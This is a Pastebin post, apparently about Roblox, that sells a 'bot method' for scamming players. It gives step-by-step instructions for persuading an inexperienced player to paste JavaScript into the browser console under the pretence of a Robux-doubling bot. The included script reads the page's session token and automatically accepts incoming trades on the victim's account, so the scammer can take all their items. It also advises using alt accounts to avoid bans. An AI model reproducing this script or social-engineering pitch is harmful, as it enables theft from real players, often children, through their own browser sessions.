Guest User

Bot Method

a guest
Nov 4th, 2022
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.21 KB | None | 0 0
  1.  
  2. Bot method
  3.  
  4.  
  5. ---------------
  6. Find someone who looks like a total noob. They have
  7. If they catch on, better to just leave then try to convince them its legit.
  8. Use an alt.
  9. Don't transfer scammed items to your main account, I almost got banned for that.
  10. Don't leak, I sold this method because I need some money. Don't give it away for free.
  11. READ THE WHOLE METHOD BEFORE YOU USE IT!
  12.  
  13.  
  14.  
  15. ------------------------------------------------------------------------
  16. Step 1: Find a Premium noob with limiteds.
  17. Step 2: Party them or join their game
  18. Step 3: Ask them if they want a Trade Currency bot and tell them it trades robux back and forth to get free money.
  19. Step 4: Once they agree, PM them the code below and say "Hit F12 in google chrome, click console, and paste this in."
  20. Step 5: They should tell you they are running it
  21. Step 6: Send them a trade for all of their stuff for your item.
  22. Step 7: The bot will auto accept it
  23. Step 8: Make sure the trade went through, and leave game/chat.
  24. -------------------------------------------------------------------------
  25.  
  26.  
  27. I AM NOT RESPONSIBLE FOR ANY LOST ITEMS, BANS, SCAMMED ITEMS, OR ANYTHING RELATING TO THIS METHOD.
  28. ITS JUST A METHOD. ANYTHING THAT GOES WRONG IS NOT MY FAULT. USE AT YOUR OWN RISK.
  29.  
  30. -------------------------------------------
  31. function POST(){
  32. $.ajax({
  33. url : "/My/Money.aspx/GetMyItemTrades",
  34. type : "POST",
  35. data : '{"statustype":"inbound","startindex":0}',
  36. contentType : "application/json; charset=UTF-8",
  37. success : function(Data){
  38. var Base = jQuery.parseJSON(jQuery.parseJSON(Data.d).Data[0])
  39. var TradeId = Base["TradeSessionID"]
  40. var Partner = Base["TradePartnerID"]
  41. var Token = ""
  42. $.get("/My/Money.aspx",function(Data){
  43. Token = Data.match(/setToken(\W(.+)\W);/)[2].replace(/'/g,"")
  44. Token = Token.replace("+","%2B").replace("/","%2F")
  45. }).always(function(){
  46. $.post("/Trade/TradeHandler.ashx?token=" + Token,{TradeID : TradeId,cmd : "pull"},function(Data){
  47. var Base = jQuery.parseJSON(Data.data).AgentOfferList
  48. var Other = 1
  49. if (Number(Base[0].AgentID) == Number(Partner)){
  50. Other = 0
  51. }
  52. var OtherVal = Base[Other]["OfferValue"]
  53. var SelfVal = Base[Other == 0 && 1 || 0]["OfferValue"]
  54. var TradeJSON = Data.data
  55. if (OtherVal/1 > SelfVal){
  56. $.post("/Trade/TradeHandler.ashx?token=" + Token,{TradeID : TradeId,TradeJSON:TradeJSON,cmd : "maketrade"})
  57. }
  58. POST()
  59. })
  60. })
  61. }
  62. })
  63. }
  64. POST()
Add Comment
Please, Sign In to add comment